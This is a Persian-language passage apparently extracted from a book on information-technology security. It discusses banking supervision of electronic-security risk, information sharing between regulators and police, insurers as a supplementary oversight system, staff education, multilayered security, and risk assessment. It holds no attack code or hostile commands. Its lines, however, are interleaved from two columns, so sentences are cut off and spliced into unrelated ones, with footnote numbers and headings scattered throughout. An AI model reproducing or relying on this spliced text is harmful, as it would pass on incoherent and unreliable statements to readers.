ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﭼﻨﺪ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺟﻬﺖ ﻋﻤﺪﻩﺍﻱ ﭘﻴـﺪﺍ
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﻧﺪ -ﺑـﻪ ﻣﺨـﺎﻃﺮﺓ ﺍﺯ ﺩﺳـﺖ
ﻣﻲﻛﻨﻨﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﻣﻌﺮﻓﻲ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﺍﻧﺒـﻮﻩ
ﺩﺍﺩﻥ ﺷﻬﺮﺕ ﻳﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳﺘﺮﺍﺗﮋﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺗﻐﻴﻴﺮ ﺍﻟﮕﻮ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻛـﺮﺩ،
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﭙﺮﺩﺍﺧﺘﻪﺍﻧﺪ .ﺍﺯ ﺍﻳﻨﺮﻭ ﺍﻳﻦ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ
ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻧﻈـﺎﺭﺕ ﺑـﺎﻧﻜﻲ ﻧﻴـﺰ ﺗﻐﻴﻴـﺮ ﻣﺮﻛـﺰ ﺛﻘـﻞ ﺻـﻨﻌﺖ
ﻭﻗﺘﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻗﻴـﻖ ﻧﻴـﺴﺖ ﻭ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ.
ﺍﺭﺯﻳﺎﺑﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﺑﻪ ﺷﻬﺮﺕ ﻭﺍﺭﺩ ﻣـﻲﺷـﻮﺩ ﺳـﺨﺖ ﺍﺳـﺖ،
ﻫﻤﺎﻫﻨﮕﻲ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺭﻭﻥﻣﺮﺯﻱ ﻭ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻜﻲ ﭼﻴـﺴﺖ؟ ﺑـﺎ
ﺗﻮﺟﻪ ﺑﻪ ﻣﺴﺌﻠﻪ ﺗﻌﻴﻴﻦ ﺳـﺮﻣﺎﻳﺔ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴـﺖ
ﻳﻚ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺑﺎ ﺁﻥ ﺭﻭﺑﺮﻭ ﻫﺴﺘﻨﺪ ﻧﻴـﺎﺯ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻳﻚ ﺭﻭﺵ ﻣﺆﺛﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺭﻭﻧـﺪ
ﺑﻪ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﻭ ﺩﻭﺍﻳـﺮ
ﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺭﺯﻳﺎﺑﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـ ﹺ
ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ )ﻧﻴﺮﻭﻫـﺎﻱ ﺍﻧﺘﻈـﺎﻣﻲ( ﺍﺳـﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ
ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺛﺒـﺖ ﮔﺰﺍﺭﺷـﺎﺕ ﭼﻨـﻴﻦ
ﻭﻗﺎﻳﻌﻲ ﺑﺎﺷﺪ ٣٩.ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻘﺎﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ
ﻱ ﺧـﻮﺩ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ،ﺻﻨﻌﺖ ﺑﻴﻤـﻪ ﺑـﻪ ﺧـﻮﺩ ﹺ ۴۰
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺳﺎﺧﺘﺎﺭ ﻣﺠﺪﺩ ﺑﻴﺎﺑﺪ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟـﺖ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﺑـﻪ ﺑﻴﻤـﻪ ﻛـﺮﺩﻥ ﺧـﻮﺩ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ ﺟﻮﺍﻧـﺐ
ﺍﺳﺘﻮﺍﺭ ﺑﺮﺳﺪ؛ ﺍﻣﺎ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳـﻦ ﺷـﺮﺍﻳﻂ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ
ﻛﺮﺩ.
41 Banking Supervision’s Electronic Banking 38 Basel
Group ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﺑﻨﺪ ۶ﻫﻤﻴﻦ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ۳۹
١٣٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺨــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷــﻮﻧﺪ ،ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ ﭼﻨﺪﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺩﺍﺭﻧـﺪ ،ﺍﻣـﺎ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ. ﻻ ﺍﻃﻼﻋــﺎﺕ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻳــﺎ ﺑــﺎﻣﻌﻤــﻮ ﹰ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪ ﻧﻤـﻲﺷـﻮﻧﺪ )ﮔـﺎﻫﻲ
ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻴـﺮﻭﻱ ﻣﻬـﻢ ﺑـﺮﺍﻱ
ﺍﻭﻗﺎﺕ ﺑﻪ ﺩﻻﻳﻞ ﺣﻘﻮﻗﻲ( .ﻣﻮﺿﻮﻉ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﺗﻐﻴﻴﺮ ﺍﻟﺰﺍﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧـﺪ
ﺩﺭ ﺍﺑﻌﺎﺩ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻓﺮﺍﺗﺮ ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺩﺭ ﻫﺮ
ﻣﻮﺟﺐ ﺑﻬﺒﻮﺩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣـﺪﺍﻗﻠﻲ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ
ﺻﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺩﻭﻟﺘﻬـﺎ ﺳـﻌﻲ ﺩﺍﺭﻧـﺪ ﺑـﺎ ﺟـﺮﺍﺋﻢ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺻﻨﻌﺖ ﺟﻬﺎﻧﻲ ﺧـﺪﻣﺎﺕ
ﻣﺤﻴﻂ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺮﺧﻴﺰﻧﺪ ،ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻴـﺰ
ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺍﻳـﻦ ﺑﺤـﺚ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛﻠﻴـﺪﻱ ﺑـﻪ
ﻻﻳﻪﺑﻨﺪﻱﺷﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺸﻨﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺗﺤﺮﻳﻚ ﻛﻨـﺪ.
ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ.
ﺛﺎﻧﻴﹰﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ
ﺭﻛﻦ ﭼﻬﺎﺭﻡ:
ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﺄﻳﻴﺪﺷـﺪﻩ ﻭ ﻗﺎﺑـﻞ
ﻗﺒﻮﻝ ﺻﻨﻌﺘﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ ﺗﺎ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ ﺭﺍ ﻛـﺎﻫﺶ ﻧﻘﺶ ﺑﻴﻤﺔ ﺧﺼﻮﺻﻲ ﺑﻪ ﻋﻨﻮﺍﻥ
ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ .ﺛﺎﻟﺜـﹰﺎ ﺷـﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﺭﺍ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﺗﻜﻤﻴﻠﻲ
ﺗﺮﻏﻴﺐ ﻛﻨﻨﺪ ﺗﺎ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ
ﺑﺨﺶ ﺳﻮﻡ
42 Certification
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٣٤
ﻧﻈﺎﺭﺗﻲ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻧـﻮﻳﻦ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﺍﻧﺠﺎﻡﺷﺪﻥ ﻣﺴﺌﻮﻟﻴﺖ ﻫﺮ ﺑﺨﺶ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ؛ ﻭ
ﻧﻈﻴﺮ ﻃﺮﺣﻬﺎﻱ ﺗﺒﺎﺩﻝ ﻓﻌﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻲ ﺍﻣـﺮﻭﺯ ،ﺩﺭ ﺁﻏـﺎﺯ
ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟ ﹺ
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﻭ ﺗﻐﻴﻴـﺮﺍﺕ
ﻃﺮﺍﺣﻲ ﺩﻭﺭﻩﻫﺎﻱ ﻣﺘﻤﺮﻛﺰ ﺑـﺮﺍﻱ ﻣﻤﺘﺤﻨـﺎﻥ ﺑـﺎ ﻛﻤـﻚ •
ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺑـﻮﺩ ﻛـﻪ ﻭﺍﺑـﺴﺘﮕﻴﻬﺎﻱ ﺩﺭﻭﻧـﻲ ﺍﻳـﻦ
ﻣﺆﺳــﺴﻪ ﭘﺎﻳــﺪﺍﺭﻱ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ ٥١ﻳــﺎ ﺩﻳﮕــﺮ ﻣﺮﺍﻛــﺰ
ﺳﻴﺴﺘﻢ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﻴﺸﺘﺮ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺁﻣﻮﺯﺷﻲ؛
ﺗﺪﻭﻳﻦ ﻳﻚ ﻃﺮﺡ ﭼﻨﺪﻣﻨﻈﻮﺭﺓ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺮﺍﻱ ﺁﻣـﻮﺯﺵ • ﺭﻛﻦ ﻫﻔﺘﻢ:
ﻣﺘﺨﺼﺼﻴﻦ ﺁﻳﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻭ ﺑﻄﻮﺭ ﻫﻤﺰﻣـﺎﻥ
ﺁﻣﻮﺯﺵ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ
ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺩﺍﻧﺶ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ.
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺭﻛﻦ ﻫﺸﺘﻢ: ﺗﺤﻠﻴﻞ ﺁﻣﺎﺭﻱ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺑﻴﺶ ﺍﺯ
ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ %۵۰ﺣﻤﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ
ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﺗﺤﺼﻴﻼﺕ ﻛـﻢ
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﺟﺰﺍﻱ ﺑﻨﻴﺎﺩﻱ ﻳﻚ
ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤـﻼﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺁﺳـﻴﺐﭘـﺬﻳﺮﺗﺮ ﺍﺳـﺖ .ﺑـﺮﻋﻜﺲ،
ﻃــﺮﺡ ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺣﻔــﻆ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫــﺎ ﻭ ﻛــﺎﻫﺶ
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺘﺼﻞ ﻣﻲﻛﻨﻨﺪ ﺍﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻣﺤﻴﻂ ﻛﺎﺭ ،ﺩﺍﺩﻩﻫـﺎﻱ ﺧـﺎﻡ
ﻧﻈﻴﺮ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺭﻗﺒـﺎ ﻭ
ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﻭ ﺑﻪ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﻴﺎﺯ
٥٥
ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨـﻮﻱ
ﻱ ﻣﻨﺤﺼﺮ ﺑﻔـﺮﺩ ﻧﻈﻴﺮ ﺍﺳﻨﺎﺩ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻠﻤﻲ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻛﺎﺭ ﹺ ﻓﺼﻞ ﺳﻮﻡ
ﻲ ﻭﻳـﮋﻩ ﻫـﺴﺘﻨﺪ.ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ
ﺩﺭ ﺩﻧﻴﺎﻳﻲ ﻛﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺭﻗﺎﺑﺖ ﺩﺭ ﺁﻥ ﺷﺪﺕ ﻣﻲﮔﻴﺮﺩ ،ﺳـﺮﻗﺖ
ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﻭ ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻓﻜﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ
ﺍﺳﺖ .ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ "ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ" ﻛﻪ ﺩﺭ ﻧﮕﺮﺵ ﻛﻠـﻲ ﻛﻠﻴﺎﺕ
ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺁﻣـﻮﺯﺵ ﻭ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ٥٣ﻭ ﺗﺤﻠﻴـﻞ ﺯﻳـﺎﻥ ٥٤ﻭ ﺁﺳـﻴﺒﻬﺎﻱ
ﻫﻮﺷﻴﺎﺭﺳﺎﺯﻱ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻔﺎﻑ ﺩﺭﻭﻥ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺗﺠﺎﺭﻱ ﺑﺮﺭﺳﻲ ﻣﻲﺷـﻮﻧﺪ؛ ،ﻣﻨـﺸﺄ ،ﻋﻤﻠﻜـﺮﺩ
ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺍﻣﻨﻴـﺖ ﻣﺤﺘﻤﻞ ،ﻭ ﺷﺪﺕ ﺍﺛـﺮﺍﺕ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮ
ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ. ﻲ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣﺮﻩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ؛ ﻧﻜـﺎﺕ ﺍﺻـﻠ ﹺ
ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺻﻮﻝ ﺍﺳﺎﺳـﻲ
ﺑﺨﺶ ﺳﻮﻡ
ﺧﻮﺩ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﻣـﻮﺭﺩ
ﺍﮔﺮﭼــﻪ ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣــﺸﺘﺮﻛﻲ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣــﺎ ﺩﺍﺷــﺘﻦ
ﺗﺼﻮﻳﺮ ﻛﺎﻣﻠﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭ ﻗﺎﻟﺐ ﻓﻌﺎﻟﻴﺖ ﺁﻥ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﻳـﻚ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ :ﻣﺮﺯﻫﺎﻱ ﺟﺪﻳﺪ
ﻲ ﺧﻮﺏ ،ﻻﺯﻡ ﺍﺳﺖ .ﻣﺠﻤﻮﻋﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘ ﹺ ﻛﻠﻴﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ -ﭼﻪ ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ -ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴـﺖ ﺩﺭ
ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻓﻊ ﺿﺎﻳﻌﺎﺕ ﺧﻄﺮﻧـﺎﻙ ﻳﻚ ﻣﺤﻴﻂ ﺟﻬﺎﻧﻲ ﻫﺴﺘﻨﺪ .ﭘﻴﺸﺮﻓﺖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ
ﻳﺎ ﻣﻮﺍﺩ ﺯﻳﺴﺘﻲ ﻓﻌﺎﻝ ﺍﺳﺖ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﻳﻚ ﺣﻤﻞ ﻭ ﻧﻘﻞ ﺩﺭ ﻗـﺮﻥ ﮔﺬﺷـﺘﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺑﺎﺯﺍﺭﻫـﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻟﻮﺍﺯﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻓﺮﺁﻳﻨـﺪ ﻧﺰﺩﻳﻜﺘﺮ ﻛﺮﺩﻩ ،ﻫﺰﻳﻨﻪﻫﺎ ﺭﺍ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻩ ﻭ ﺑﺎﻋـﺚ ﺷـﺪﻩ
